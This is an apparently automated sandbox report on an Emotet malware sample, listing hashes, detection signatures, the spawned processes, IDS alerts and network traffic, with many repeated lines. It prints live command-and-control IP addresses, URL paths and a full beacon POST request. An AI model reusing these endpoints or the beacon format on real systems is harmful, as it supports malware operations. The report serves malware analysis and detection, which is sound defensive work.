Loading ...

Play interactive tourEdit tour

Analysis Report cK2ClsvtJE

Overview

General Information

Sample Name:cK2ClsvtJE (renamed file extension from none to exe)
Analysis ID:317592
MD5:d702d5945976551dd274448376f4e7d8
SHA1:7309409ae85f49173401b060089fbf79b4b893b6
SHA256:05e955f0267f4e980209f79746449b83d3c176bbb2f8ea940eef07ec2818b417

Most interesting Screenshot:

Detection

Emotet
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Emotet
Changes security center settings (notifications, updates, antivirus, firewall)
Drops executables to the windows directory (C:\Windows) and starts them
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for sample
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files to the windows directory (C:\Windows)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • cK2ClsvtJE.exe (PID: 6068 cmdline: 'C:\Users\user\Desktop\cK2ClsvtJE.exe' MD5: D702D5945976551DD274448376F4E7D8)
    • GlobCollationHost.exe (PID: 3164 cmdline: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exe MD5: D702D5945976551DD274448376F4E7D8)
  • svchost.exe (PID: 4812 cmdline: c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -p -s NgcSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3564 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s NgcCtnrSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5996 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6376 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6644 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6940 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3348 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4552 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5408 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3888 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 6404 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 2596 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 1540 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 3396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6508 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.222966420.0000000002F21000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    00000001.00000002.221574418.0000000002A54000.00000004.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      00000004.00000002.486175909.00000000028A0000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        00000004.00000002.486354323.00000000028E4000.00000004.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
          00000004.00000002.486498394.0000000002921000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
            Click to see the 1 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            4.2.GlobCollationHost.exe.2920000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
              1.2.cK2ClsvtJE.exe.2f20000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security

                Sigma Overview

                No Sigma rule has matched

                Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Multi AV Scanner detection for submitted fileShow sources
                Source: cK2ClsvtJE.exeVirustotal: Detection: 60%Perma Link
                Source: cK2ClsvtJE.exeMetadefender: Detection: 43%Perma Link
                Source: cK2ClsvtJE.exeReversingLabs: Detection: 72%
                Source: cK2ClsvtJE.exeVirustotal: Detection: 60%Perma Link
                Source: cK2ClsvtJE.exeMetadefender: Detection: 43%Perma Link
                Source: cK2ClsvtJE.exeReversingLabs: Detection: 72%
                Machine Learning detection for sampleShow sources
                Source: cK2ClsvtJE.exeJoe Sandbox ML: detected
                Source: cK2ClsvtJE.exeJoe Sandbox ML: detected
                Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exeCode function: 4_2_02922680 CryptCreateHash,CryptAcquireContextW,RtlAllocateHeap,CryptImportKey,LocalFree,CryptDecodeObjectEx,CryptGenKey,
                Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exeCode function: 4_2_029222C0 CryptExportKey,CryptDestroyHash,memcpy,CryptEncrypt,RtlAllocateHeap,CryptDuplicateHash,CryptGetHashParam,
                Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exeCode function: 4_2_02921FF0 memcpy,CryptDuplicateHash,CryptDestroyHash,RtlAllocateHeap,
                Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exeCode function: 4_2_02922680 CryptCreateHash,CryptAcquireContextW,RtlAllocateHeap,CryptImportKey,LocalFree,CryptDecodeObjectEx,CryptGenKey,
                Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exeCode function: 4_2_029222C0 CryptExportKey,CryptDestroyHash,memcpy,CryptEncrypt,RtlAllocateHeap,CryptDuplicateHash,CryptGetHashParam,
                Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exeCode function: 4_2_02921FF0 memcpy,CryptDuplicateHash,CryptDestroyHash,RtlAllocateHeap,
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02F23A20 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,_snwprintf,HeapFree,FindClose,
                Source: C:\Users\user\Desktop\cK2ClsvtJE.exeCode function: 1_2_02F23A20 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,_snwprintf,HeapFree,FindClose,
                Source: C:\Windows\SysWOW64\HoloShellRuntime\GlobCollationHost.exeCode function: 4_2_02923A20 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,_snwprintf,HeapFree,FindClose,

                Networking:

                barindex
                Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                Source: TrafficSnort IDS: 2404320 ET CNC Feodo Tracker Reported CnC Server TCP group 11 192.168.2.3:49718 -> 190.202.229.74:80
                Source: TrafficSnort IDS: 2404304 ET CNC Feodo Tracker Reported CnC Server TCP group 3 192.168.2.3:49730 -> 118.69.11.81:7080
                Source: TrafficSnort IDS: 2404338 ET CNC Feodo Tracker Reported CnC Server TCP group 20 192.168.2.3:49732 -> 70.39.251.94:8080
                Source: TrafficSnort IDS: 2404344 ET CNC Feodo Tracker Reported CnC Server TCP group 23 192.168.2.3:49742 -> 87.230.25.43:8080
                Source: TrafficSnort IDS: 2404348 ET CNC Feodo Tracker Reported CnC Server TCP group 25 192.168.2.3:49743 -> 94.23.62.116:8080
                Source: TrafficSnort IDS: 2404320 ET CNC Feodo Tracker Reported CnC Server TCP group 11 192.168.2.3:49718 -> 190.202.229.74:80
                Source: TrafficSnort IDS: 2404304 ET CNC Feodo Tracker Reported CnC Server TCP group 3 192.168.2.3:49730 -> 118.69.11.81:7080
                Source: TrafficSnort IDS: 2404338 ET CNC Feodo Tracker Reported CnC Server TCP group 20 192.168.2.3:49732 -> 70.39.251.94:8080
                Source: TrafficSnort IDS: 2404344 ET CNC Feodo Tracker Reported CnC Server TCP group 23 192.168.2.3:49742 -> 87.230.25.43:8080
                Source: TrafficSnort IDS: 2404348 ET CNC Feodo Tracker Reported CnC Server TCP group 25 192.168.2.3:49743 -> 94.23.62.116:8080
                Source: global trafficTCP traffic: 192.168.2.3:49730 -> 118.69.11.81:7080
                Source: global trafficTCP traffic: 192.168.2.3:49732 -> 70.39.251.94:8080
                Source: global trafficTCP traffic: 192.168.2.3:49742 -> 87.230.25.43:8080
                Source: global trafficTCP traffic: 192.168.2.3:49743 -> 94.23.62.116:8080
                Source: global trafficTCP traffic: 192.168.2.3:49730 -> 118.69.11.81:7080
                Source: global trafficTCP traffic: 192.168.2.3:49732 -> 70.39.251.94:8080
                Source: global trafficTCP traffic: 192.168.2.3:49742 -> 87.230.25.43:8080
                Source: global trafficTCP traffic: 192.168.2.3:49743 -> 94.23.62.116:8080
                Source: Joe Sandbox ViewIP Address: 87.230.25.43 87.230.25.43
                Source: Joe Sandbox ViewIP Address: 87.230.25.43 87.230.25.43
                Source: Joe Sandbox ViewIP Address: 94.23.62.116 94.23.62.116
                Source: Joe Sandbox ViewASN Name: GD-EMEA-DC-SXB1DE GD-EMEA-DC-SXB1DE
                Source: Joe Sandbox ViewASN Name: GD-EMEA-DC-SXB1DE GD-EMEA-DC-SXB1DE
                Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
                Source: Joe Sandbox ViewASN Name: CANTVServiciosVenezuelaVE CANTVServiciosVenezuelaVE
                Source: global trafficTCP traffic: 192.168.2.3:49718 -> 190.202.229.74:80
                Source: global trafficTCP traffic: 192.168.2.3:49718 -> 190.202.229.74:80
                Source: global trafficHTTP traffic detected: POST /pl7M2FpV1h4w7A/3V7UsUDHt/FvyE57Oxtj4SBTHl3d/ofERnscZ0Q0lwIP/gVFPkBSLJ99/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 94.23.62.116/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=------------------YzlUCjKU14tSkItawLUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 94.23.62.116:8080Content-Length: 4580Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /pl7M2FpV1h4w7A/3V7UsUDHt/FvyE57Oxtj4SBTHl3d/ofERnscZ0Q0lwIP/gVFPkBSLJ99/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 94.23.62.116/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=------------------YzlUCjKU14tSkItawLUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 94.23.62.116:8080Content-Length: 4580Cache-Control: no-cache
                Source: unknownTCP traffic detected without corresponding DNS query: 190.202.229.74
                Source: unknownTCP traffic detected without corresponding DNS query: 190.202.229.74
                Source: unknownTCP traffic detected without corresponding DNS query: 190.202.229.74
                Source: unknownTCP traffic detected without corresponding DNS query: 118.69.11.81
                Source: unknownTCP traffic detected without corresponding DNS query: 118.69.11.81
                Source: unknownTCP traffic detected without corresponding DNS query: 118.69.11.81
                Source: unknownTCP traffic detected without corresponding DNS query: 70.39.251.94
                Source: unknownTCP traffic detected without corresponding DNS query: 70.39.251.94
                Source: unknownTCP traffic detected without corresponding DNS query: 70.39.251.94
                Source: unknownTCP traffic detected without corresponding DNS query: 87.230.25.43
                Source: unknownTCP traffic detected without corresponding DNS query: 87.230.25.43
                Source: unknownTCP traffic detected without corresponding DNS query: 87.230.25.43
                Source: unknownTCP traffic detected without corresponding DNS query: 94.23.62.116
                Source: unknownTCP traffic detected without corresponding DNS query: 94.23.62.116
                Source: unknownTCP traffic detected without corresponding DNS query: 94.23.62.116
                Source: unknownTCP traffic detected without corresponding DNS query: 94.23.62.116
                Source: unknownTCP traffic detected without corresponding DNS query: 94.23.62.116
                Source: unknownTCP traffic detected without corresponding DNS query: 94.23.62.116
                Source: unknownTCP traffic detected without corresponding DNS query: 94.23.62.116
                Source: unknownTCP traffic detected without corresponding DNS query: 190.202.229.74
                Source: unknownTCP traffic detected without corresponding DNS query: 190.202.229.74
                Source: unknownTCP traffic detected without corresponding DNS query: 190.202.229.74
                Source: unknownTCP traffic detected without corresponding DNS query: 118.69.11.81
                Source: unknownTCP traffic detected without corresponding DNS query: 118.69.11.81
                Source: unknownTCP traffic detected without corresponding DNS query: 118.69.11.81
                Source: unknownTCP traffic detected without corresponding DNS query: 70.39.251.94
                Source: unknownTCP traffic detected without corresponding DNS query: 70.39.251.94
                Source: unknownTCP traffic detected without corresponding DNS query: 70.39.251.94
                Source: unknownTCP traffic detected without corresponding DNS query: 87.230.25.43
                Source: unknownTCP traffic detected without corresponding DNS query: 87.230.25.43
                Source: unknownTCP traffic detected without corresponding DNS query: 87.230.25.43
                Source: unknownTCP traffic detected without corresponding DNS query: 94.23.62.116
                Source: unknownTCP traffic detected without corresponding DNS query: 94.23.62.116
                Source: unknownTCP traffic detected without corresponding DNS query: 94.23.62.116
                Source: unknownTCP traffic detected without corresponding DNS query: 94.23.62.116
                Source: unknownTCP traffic detected without corresponding DNS query: 94.23.62.116
                Source: unknownTCP traffic detected without corresponding DNS query: 94.23.62.116
                Source: unknownTCP traffic detected without corresponding DNS query: 94.23.62.116
                Source: unknownHTTP traffic detected: POST /pl7M2FpV1h4w7A/3V7UsUDHt/FvyE57Oxtj4SBTHl3d/ofERnscZ0Q0lwIP/gVFPkBSLJ99/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 94.23.62.116/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=------------------YzlUCjKU14tSkItawLUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 94.23.62.116:8080Content-Length: 4580Cache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /pl7M2FpV1h4w7A/3V7UsUDHt/FvyE57Oxtj4SBTHl3d/ofERnscZ0Q0lwIP/gVFPkBSLJ99/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 94.23.62.116/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=------------------YzlUCjKU14tSkItawLUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 94.23.62.116:8080Content-Length: 4580Cache-Control: no-cache
                Source: GlobCollationHost.exe, 00000004.00000003.362692520.0000000002A49000.00000004.00000001.sdmpString found in binary or memory: http://118.69.11.81:7080/lPWkf5UOGPzKK/pepGd3Y462mujpP2UXh/gWESD/NClY/BIcFyZDA6E/M1XHKzIy4/
                Source: GlobCollationHost.exe, 00000004.00000003.362692520.0000000002A49000.00000004.00000001.sdmpString found in binary or memory: http://118.69.11.81:7080/lPWkf5UOGPzKK/pepGd3Y462mujpP2UXh/gWESD/NClY/BIcFyZDA6E/M1XHKzIy4/TZ
                Source: GlobCollationHost.exe, 00000004.00000003.362692520.0000000002A49000.00000004.00000001.sdmpString found in binary or memory: http://118.69.11.81:7080/lPWkf5UOGPzKK/pepGd3Y462mujpP2UXh/gWESD/NClY/BIcFyZDA6E/M1XHKzIy4/id3Z
                Source: GlobCollationHost.exe, 00000004.00000003.362692520.0000000002A49000.00000004.00000001.sdmpString found in binary or memory: http://70.39.251.94:8080/ZXuOy1n8fat5Qa/
                Source: GlobCollationHost.exe, 00000004.00000003.362692520.0000000002A49000.00000004.00000001.sdmpString found in binary or memory: http://70.39.251.94:8080/ZXuOy1n8fat5Qa/dB
                Source: GlobCollationHost.exe, 00000004.00000003.362692520.0000000002A49000.00000004.00000001.sdmpString found in binary or memory: http://70.39.251.94:8080/ZXuOy1n8fat5Qa/pData
                Source: GlobCollationHost.exe, 00000004.00000002.487038775.0000000002A34000.00000004.00000001.sdmpString found in binary or memory: http://87.230.25.43:8080/9hZu4ZKUd2Y5T8WBm1d/YRjEk9/
                Source: GlobCollationHost.exe, 00000004.00000002.487038775.0000000002A34000.00000004.00000001.sdmpString found in binary or memory: http://87.230.25.43:8080/9hZu4ZKUd2Y5T8WBm1d/YRjEk9/X
                Source: GlobCollationHost.exe, 00000004.00000002.487038775.0000000002A34000.00000004.00000001.sdmpString found in binary or memory: http://94.23.62.116:8080/pl7M2FpV1h4w7A/3V7UsUDHt/FvyE57Oxtj4SBTHl3d/ofERnscZ0Q0lwIP/gVFPkBSLJ99/
                Source: svchost.exe, 00000007.00000002.488719812.000002384C614000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                Source: svchost.exe, 00000007.00000002.488719812.000002384C614000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                Source: svchost.exe, 00000007.00000002.488637154.000002384C600000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
                Source: svchost.exe, 00000007.00000002.488323548.000002384C4B0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                Source: svchost.exe, 00000011.00000002.312507428.000001ABFB213000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.com
                Source: svchost.exe, 0000000E.00000002.485004591.000001F757040000.00000004.00000001.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
                Source: svchost.exe, 0000000E.00000002.485004591.000001F757040000.00000004.00000001.sdmpString found in binary or memory: https://%s.xboxlive.com
                Source: svchost.exe, 0000000E.00000002.485004591.000001F757040000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.com
                Source: svchost.exe, 0000000E.00000002.485004591.000001F757040000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.comr
                Source: svchost.exe, 00000011.00000003.311927604.000001ABFB260000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                Source: svchost.exe, 0000000E.00000002.485004591.000001F757040000.00000004.00000001.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
                Source: svchost.exe, 0000000E.00000002.485004591.000001F757040000.00000004.00000001.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
                Source: svchost.exe, 00000011.00000003.311958688.000001ABFB25A000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                Source: svchost.exe, 00000011.00000003.311927604.000001ABFB260000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                Source: svchost.exe, 00000011.00000002.312684951.000001ABFB23D000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                Source: svchost.exe, 00000011.00000003.311927604.000001ABFB260000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                Source: svchost.exe, 00000011.00000003.311896345.000001ABFB249000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
                Source: svchost.exe, 00000011.00000002.312684951.000001ABFB23D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                Source: svchost.exe, 00000011.00000003.311927604.000001ABFB260000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                Source: svchost.exe, 00000011.00000003.311927604.000001ABFB260000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                Source: svchost.exe, 00000011.00000003.311927604.000001ABFB260000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                Source: svchost.exe, 00000011.00000003.312024991.000001ABFB240000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                Source: svchost.exe, 00000011.00000003.312024991.000001ABFB240000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                Source: svchost.exe, 00000011.00000003.311927604.000001ABFB260000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                Source: svchost.exe, 00000011.00000003.312024991.000001ABFB240000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.311958688.000001ABFB25A000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                Source: svchost.exe, 00000011.00000003.311958688.000001ABFB25A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                Source: svchost.exe, 00000011.00000003.311958688.000001ABFB25A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                Source: svchost.exe, 00000011.00000003.311958688.000001ABFB25A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                Source: svchost.exe, 00000011.00000003.311880922.000001ABFB263000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
                Source: svchost.exe, 00000011.00000003.311927604.000001ABFB260000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                Source: svchost.exe, 00000011.00000002.312684951.000001ABFB23D000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                Source: svchost.exe, 00000011.00000003.289855452.000001ABFB232000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                Source: svchost.exe, 00000011.00000002.312684951.000001ABFB23D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                Source: svchost.exe, 00000011.00000002.312507428.000001ABFB213000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.312684951.000001ABFB23D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                Source: svchost.exe, 00000011.00000003.312024991.000001ABFB240000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                Source: svchost.exe, 00000011.00000003.312024991.000001ABFB240000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                Source: svchost.exe, 00000011.00000003.289855452.000001ABFB232000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                Source: svchost.exe, 00000011.00000003.289855452.000001ABFB232000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                Source: svchost.exe, 00000011.00000003.311896345.000001ABFB249000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                Source: GlobCollationHost.exe, 00000004.00000003.362692520.0000000002A49000.00000004.00000001.sdmpString found in binary or memory: http://118.69.11.81:7080/lPWkf5UOGPzKK/pepGd3Y462mujpP2UXh/gWESD/NClY/BIcFyZDA6E/M1XHKzIy4/
                Source: GlobCollationHost.exe, 00000004.00000003.362692520.0000000002A49000.00000004.00000001.sdmpString found in binary or memory: http://118.69.11.81:7080/lPWkf5UOGPzKK/pepGd3Y462mujpP2UXh/gWESD/NClY/BIcFyZDA6E/M1XHKzIy4/TZ
                Source: GlobCollationHost.exe, 00000004.00000003.362692520.0000000002A49000.00000004.00000001.sdmpString found in binary or memory: http://118.69.11.81:7080/lPWkf5UOGPzKK/pepGd3Y462mujpP2UXh/gWESD/NClY/BIcFyZDA6E/M1XHKzIy4/id3Z
                Source: GlobCollationHost.exe, 00000004.00000003.362692520.0000000002A49000.00000004.00000001.sdmpString found in binary or memory: http://70.39.251.94:8080/ZXuOy1n8fat5Qa/
                Source: GlobCollationHost.exe, 00000004.00000003.362692520.0000000002A49000.00000004.00000001.sdmpString found in binary or memory: http://70.39.251.94:8080/ZXuOy1n8fat5Qa/dB
                Source: GlobCollationHost.exe, 00000004.00000003.362692520.0000000002A49000.00000004.00000001.sdmpString found in binary or memory: http://70.39.251.94:8080/ZXuOy1n8fat5Qa/pData
                Source: GlobCollationHost.exe, 00000004.00000002.487038775.0000000002A34000.00000004.00000001.sdmpString found in binary or memory: http://87.230.25.43:8080/9hZu4ZKUd2Y5T8WBm1d/YRjEk9/
                Source: GlobCollationHost.exe, 00000004.00000002.487038775.0000000002A34000.00000004.00000001.sdmpString found in binary or memory: http://87.230.25.43:8080/9hZu4ZKUd2Y5T8WBm1d/YRjEk9/X
                Source: GlobCollationHost.exe, 00000004.00000002.487038775.0000000002A34000.00000004.00000001.sdmpString found in binary or memory: http://94.23.62.116:8080/pl7M2FpV1h4w7A/3V7UsUDHt/FvyE57Oxtj4SBTHl3d/ofERnscZ0Q0lwIP/gVFPkBSLJ99/
                Source: svchost.exe, 00000007.00000002.488719812.000002384C614000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                Source: svchost.exe, 00000007.00000002.488719812.000002384C614000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                Source: svchost.exe, 00000007.00000002.488637154.000002384C600000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
                Source: svchost.exe, 00000007.00000002.488323548.000002384C4B0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                Source: svchost.exe, 00000011.00000002.312507428.000001ABFB213000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.com
                Source: svchost.exe, 0000000E.00000002.485004591.000001F757040000.00000004.00000001.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
                Source: svchost.exe, 0000000E.00000002.485004591.000001F757040000.00000004.00000001.sdmpString found in binary or memory: https://%s.xboxlive.com
                Source: svchost.exe, 0000000E.00000002.485004591.000001F757040000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.com
                Source: svchost.exe, 0000000E.00000002.485004591.000001F757040000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.comr
                Source: svchost.exe, 00000011.00000003.311927604.000001ABFB260000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                Source: svchost.exe, 0000000E.00000002.485004591.000001F757040000.00000004.00000001.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
                Source: svchost.exe, 0000000E.00000002.485004591.000001F757040000.00000004.00000001.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
                Source: svchost.exe, 00000011.00000003.311958688.000001ABFB25A000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                Source: svchost.exe, 00000011.00000003.311927604.000001ABFB260000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                Source: svchost.exe, 00000011.00000002.312684951.000001ABFB23D000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                Source: svchost.exe, 00000011.00000003.311927604.000001ABFB260000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
